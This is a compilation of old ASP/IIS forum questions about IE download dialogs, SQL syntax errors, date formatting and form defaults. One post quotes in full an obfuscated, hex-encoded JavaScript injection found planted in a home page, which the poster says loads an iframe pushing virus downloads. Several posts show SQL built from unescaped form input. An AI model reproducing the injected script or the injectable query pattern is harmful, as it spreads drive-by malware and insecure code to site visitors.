IE's Default For Save As Type Incorrect

I'm using a binary stream to send down a file with ASP from the web
server. I've been having trouble with IE and getting it to recognize
my file. I've added the filename as a paramater(?filename=file.jpgw)
to handle IE's mime type mangling, but I'm still having trouble with
IE's default Save As Type being HTML.

When we send down a jpgw
(geo-jpeg) file IE wants to save it as an HTML file. I've got the
correct filename showing in the Filename box, and if I choose the All
Files option from the Save As Type drop down then the file is saved
with the correct extension. I'd like to have the All Files option
choosen by default. I know it's just a couple of clicks but we have
some noivce users that can't seem to get that.

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Default Save As Type And Filename

I have an asp page that produces output from a database. This allows a
simple way for the user to save the data to a text file by going to
File->Save as...

The default save as options always defaults to a particular filename and the
save as type is always html, therefore the user has to manually type a
filename and choose Text File (*.txt) as the type.

I remember I was able to overide ride these options with the following code.

Response.ContentType = "text/plain"
Response.AddHeader "Content-Disposition", "inline; filename=myfilename"

This doesn't seem to be working for me anymore.

Any thoughts?

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Setting A Default Value For The Input Type File?

I'm building a system where a presenter uploads a PPT to my server and
then I show it to all the participants. The problem is that most of the
media in the PPT is usually linked, so I'll need to upload all that

Assuming I can parse the PPT and figure the exact name and
location of each of the media files I need from his hard-disk, is there
any way I can upload all these files automatically, without having to
make the user choose each of these files manually? If that's not
possible, can I atleast show the user a page with a list of input boxes
of type file, pre-populated with the file-path and name of the media
files I need, so that the user can just click 'Submit' without having
to browse and select each of them?

Please say yes. It would be a major usability crisis if my users had to
keep hitting the browse button so many times for each PPT! Especially
when I know exactly what files I need and where they are! I know that
this has a lot to do with browser security, but there's got to be SOME
way out?

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New Type Of Injection? Rewrite Default Document?

This is weird, I'm pretty familiar with SQL Injection - but we're getting these weird injection that is writing in the default document or home page. What it's doing is putting in script code at the top or bottom of the home page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c 9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269
70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>

What it's doing is decoding itself into an iframe that links out to popups that will try and download a virus on your machine. I don't get the popup in my machine because i think i have a newer version of IE. But some people have complained that it is installing a virus on their machine.

Also what is crazy is when I replace the file with a good version. In about 30 mins, it automatically overwritten with the infected version. Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.

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Save As Type List

I am sending an attachment to a user with the following code. This
successfully prompts the user to Save or Open, provides the correct file
name, and displays "Microsoft Excel Worksheet" as the Type.

However, when the user clicks "Save", the "Save As File Type" in the
resulting dialog displays 'HTML Document'. There is only one other entry in
the list - "All Files". How can I modify the code to display "Excel
Document" (or some such) in the "Save As Type" list? Code:

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Default Folder Location For Input Type="file"

I have some ASP pages on my intranet site providing a helpdesk to my users. As part of logging a helpdesk call I am prompting them to link to a file using input type="file".

The file is on a network drive and the problem is when you click on the browse button it defaults to the clients desktop as the starting point of the browsing process. I would like to set a default location to start browsing eg etwork_serverhelpdesk to avoid confusion. Does anyone know of a way to do this ?

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Incorrect Syntax Near ')'.

StrSql = "SELECT * FROM [" & Screen & "] WHERE (CPN="&(COORDID)&") AND (CNUM="&(CNUMQS)&")

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Incorrect Syntax Near '' ?

I get this error with this sql statement in MSSQLincorrect syntax near '' ?

this is part or the sql statement:-

ORDER BY Sum([Ratings].[Rating])Count([Ratings].[RatingID]) DESC

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Incorrect DB Schema?

I need from an Access database using ASP. Everything I need can be found in the database, but it is scattered among different tables. Here's the situation:

Currently many tables exist, one for each event. Each table contains participants and results. Each table is for only one venue, but many tables for the same venue may exist (different events at the same location on a different date).

I need a table of participants that automatically updates if a new participant is found.

I need a table of venues that automatically updates if a new venue is found.

I need to be able to show a particpant's results at any given venue for any given time period. Code:

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Incorrect Sessionkey

Recently i noticed that there was an incorrect piece of data displayed in a
page and after investigating i noticed that it belongs to another sessionkey.

Have you experienced anything like this? i.e. when you retrieve the
sessionkey from the session variable, you get a different one?

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COUNT Field Incorrect

Getting this error:

[vbs]Microsoft OLE DB Provider for ODBC Drivers error '80040e10'

[Microsoft][ODBC Microsoft Access Driver]COUNT field incorrect

/admin/articles.asp, line 277

On this line:

SQL="UPDATE article SET title='" & request.form("title") & "',topic= " & request.form("topic") & " ,article_text='" & request.form("article_text") & "' WHERE title='" & request.form("hidden") & "'"

When it is just one line coming from the article_text thing it works fine, when it is several lines it gives this COUNT error...

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Incorrect Syntax Near The Word

I converted my Access databases to MS SQL. I then changed the code in my ASP pages to compensate. I wanted to check that it would work. I ran into a problem: It keeps saying:

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'User'.

BTW this piece of code works fine in Access and only crashes when using SQL. Can't find anything relevant on the Internet. Can someone help please? Code:

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Error Incorrect Syntax Near

When i insert some values float in a form made with ASP appear an error message like this:

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Line 1: Incorrect syntax near ','.

sql="select id from tbl_monete where id_taglio="&idtaglio sql, conn

idTaglio it's the value of money that can be like 0,5 0,2,
0,1 etc etc
If i try one or two times it'll work correctly, why?
Table tbl_monete has field id_taglio that is float.

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Incorrect Date Format

my problem is the FormatDateTime function it is changing the date format to MM/dd/yyyy but we need dd/MM/yyyy. We already changed the settings for the administrator user. Access the regedit tool and change the format to dd/MM/yyy on all the users on the server but we are still getting the incorrect format.

First we got for every case the format switch. For example we ask for this FormatDateTime("01/10/2003",2) Octuber 1st, 2003 an the result was "10/01/2003" January 10th, 2003
for days lower than the 12th and even if we send FormatDateTime("31/10/2003", 2) we got "10/31/2003". The server is running Windows 2000 Advanced Server with IIS 5.0

After some changes this is what is happening know

FormatDateTime("01/10/2003", 2) -- > 10/01/2003
FormatDateTime("31/10/2003", 2) -- > 31/10/2003

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Incorrect Http Form Parsing

When I do testing with a test post page, everything functions properly. When
the actual customer does the post, the attribute following the "file"
attribute is concatenated to the file itself. When I execute the
HttpPostedFile.SaveAs(), the resulting file is what is sent Plus the
following form attribute. This following attribute is not in any Collection
from the Request object. Code:

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MS Access Date Format Is Incorrect

I am storing dates in a database. WHen i come to do sql queries on the dates access is interpreting them as US format (mm/dd/yyyy). When the date is stored in the db it is in the correct uk format (dd/mm/yyyy) but when asp passes the queries to access the date format changes if the day is above 13.

For example if the date being searched is 10/2/2006 (10th feb 2006) it is searching the database for 2nd October 2006. If the i pass is 13/02/2006 (13th feb 2006) it searches it correctly.

I have tried setting the session.lcid to 2057 but this makes no difference. I read somewhere that access automatically treates dates as US format and only tries another format if the us format doesnt make sense. Is there any way around this?

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Formatting Date Incorrect Code

I have two dynamic listboxes.One is a date and needs formatting.I am using DWMX and therefore used the format function within the dynamic listbox wizard.When I run the page the listbox without formatting is ok, but the date listbox returns the following:

Microsoft VBScript runtime error '800a000d'. Type Mismatch 'DoDateTime' /admincontacts.asp, line 189

Line 189 is the following:

<option value="<%=(rsAdmin.Fields.Item("Date_Added").Value)%>" <%If (Not isNull(DoDateTime((rsAdmin.Fields.Item("Date_Added").Value), 1, 4105))) Then If (CStr(rsAdmin.Fields.Item("Date_Added").Value) = CStr(DoDateTime((rsAdmin.Fields.Item("Date_Added").Value), 1, 4105))) Then Response.Write("SELECTED") : Response.Write("")%> ><%=(rsAdmin.Fields.Item("Date_Added").Value)%></option>

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Configured Identity Incorrect Error

we have just migrated to a new server both with database and web server-
migrating all web projects and all databases.then we decided to rename the
new server.we tried running all web projects on the new server but it doesnt
work causing error "configured identity incorrect, check username and
password" in a certain line in the code.

i have searched for possile solutions like synchronizing identity account in
the 3 locations where this account is stored but it seems it doesnt work.
Earlier i was able to fix scheduled jobs in the database not working caused
by renaming the new server which is also the name of the database server.But
problems in the web files itself (asp) are giving me headache particularly in
code lines with "createobject."

Whats seems to be the particular problem?Can anyone point me to the right
resources to fix this prob?

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ASP/mySQL Incorrect Date Format Returned

I have all of the dates I use in my tables stored as date in the YYYY/MM/DD format, with the columns set to DATE.

When I do any queries on the database (not usinf ASP) I get YYYY/MM/DD format returned.

When I do a recordset("datefield") ASP request I get D/M/YYYY returned. I have not asked anything to convert it, I have no idea where it is getting converted. It is a real pain, as I need to copy these dates through out the table, and they are getting returned in the wrong format.

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XMLHTTP - Trying To Replace Incorrect Displayed Chrs With The Correct Ones

I have used xmlHTTP to grab a page from a server.. The page has the '£'
symbol in it, when it get to my site it is displayed as a '?'.. I have tryed
replace every way I know and it does not swap back..

I have tryed replace "?" , "£"
I have tryed chr(63) , chr(163)
I have tryed "?" , &pound;

nothing works, except it does change the real '?' on the page, I mean the
'?' that started out as '?' and not as '£'
if I right a bit of code to count the '£' on the page it get the total right
including the original '?' and the '?' that are supposed to be '£'.. I dont
understand it I can count them by saying if {loopchr} = chr(63) but the the
chr(63) does not work in a replace statement..

I have examend the feed from theXMLHTTP and they are or seem to be got a '?'
and yet I cant replace them

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Problems Wiht .hta Page. Error 405 - Address Incorrect.

I have IIS 5.0 running on a Win2000 server. I have
scripts that I want to run on the web page. It was
suggested to me to create an .HTA page instead of .asp
or .html to make them run. The scripts now run fine, but
when the action is finished, I get the error:

The page cannot be displayed
The page you are looking for cannot be displayed because
the page address is incorrect.

HTTP 405 - Resource not allowed

after completing a task associated with a button press,
in this case a folder copy!

I'm not very familiar with .hta pages, can someone help
me with why I might be getting this error. Are .hta
pages supposed to be used with newer version of IIS
instead of 5.0

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Error Type:Microsoft VBScript Runtime (0x800A000D) Type Mismatch: 'UBound'

I got a problem while running an application. The code for this is as follows:

aList = Split(strMsg,";")
For nX = 0 to UBound(aList)
set rs1=conn.execute("insert into tbl_BackupfileInfo(Filename,Createddate,Createdtim e)values('" &aList(nX)&"','"&var_date&"','"&var_time&"')")

while runnig this application some times it works fine .But some times it giving an error

Error Type:Microsoft VBScript runtime (0x800A000D) Type mismatch: 'UBound'.

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ServerVariables("URL") Return Incorrect Pagename

From Page1.asp, I use "Server.transfer" to "REDIRECT" to another asp page
in page2.asp I use Request.ServerVariables("URL") and
Request.ServerVariables("REFERER") to get the lastpage and the actual page,
this method (or property) return incorrect values: "Page1.asp" and ""


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Default Value

if for list box, check box or radio button. in asp. how can i write to make it a default value??

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IE's Default

I'm using a binary stream to send down a file from the web server. I've been having trouble with IE and getting it to recognize my file. I've added the filename as a paramater(?filename=file.jpgw) to handle IE's mime type mangling, but I'm still having trouble with IE's default Save As Type being HTML. When we send down a jpgw (geo-jpeg) file IE wants to save it as an HTML file. I've got the correct filename showing in the Filename box, and if I choose the All Files option from the Save As Type drop down then the file is saved with the correct extension. I'd like to have the All Files option choosen by default. I know it's just a couple of clicks but we have some noivce users that can't seem to get that

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I wrote an application that generates reports.It then presents a page where
I click a button [javascript:print()] to open the print page. However, I
have a fixed printer and would like to know how to print to the default
printer without me clicking anything. So the page will just load up and
print. Or when I click a button. I just don't want the select printer screen
to pop up. Much similar to clicking the print button on top of the address
bar in Internet Explorer.

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my new site uses default.asp, instead of using index.asp. this is how my old site was done. now i get error 500. is this because it is trying to find index.asp or because my database isn;t workjing properly? i'm tired and being stupid i think. it's reall probably the database, but i just want to make sure in my sleep deprived state.

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Specify Default Button

I want to make it so that when the user is looking at a rendered ASP page
and they hit the ENTER key, one of the buttons on the form gets "clicked".
In other words I want for the user to not have to click on the button, and
just hit ENTER instead. How do I specify the button?

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Combo Default Value

This is the code for a combo box, and I would like to make certain value the default value, so that appears unless users select somthing else.

call rs.Open("SELECT * FROM Trim.dbo.luDecisionMaker ORDER BY DecisionMakerName" _
, myCon)

do while not rs.EOF
Response.Write("<OPTION value=" & rs("DecisionMakerID"))
if rs("DecisionMakerID") = nDecisionMaker then
Response.Write(" selected")
end if
Response.Write(">" & _
rs("DecisionMakerName") & "</OPTION>" & Chr(10))


It comes from a table and has PropertyDetailsID(1,2,3,4) and PropertyDetailsname(Fee, 5,10,Other) and for example "Fee" needs to be the dafault value.

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New User In DB Default

If a new user is added to the database through a webform, and they would usually have immediate access to member only services, is there a way to make them nonactive in a MS access db until an admin activates them?

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Default Compenent

I am wanting to compress/zip a file up on the server and email it. Is there a default component that should be installed on the server that will compress/zip files? If not is there FREE ones that anyone would suggest?

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Default Value In Field

with "select @@IDENTITY" i get the value of the last field insered.. i would
like to get also the

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Default Include

Is it possible to add a default include file to every ASP-page servered on IIS? So I do not have to modify every page.

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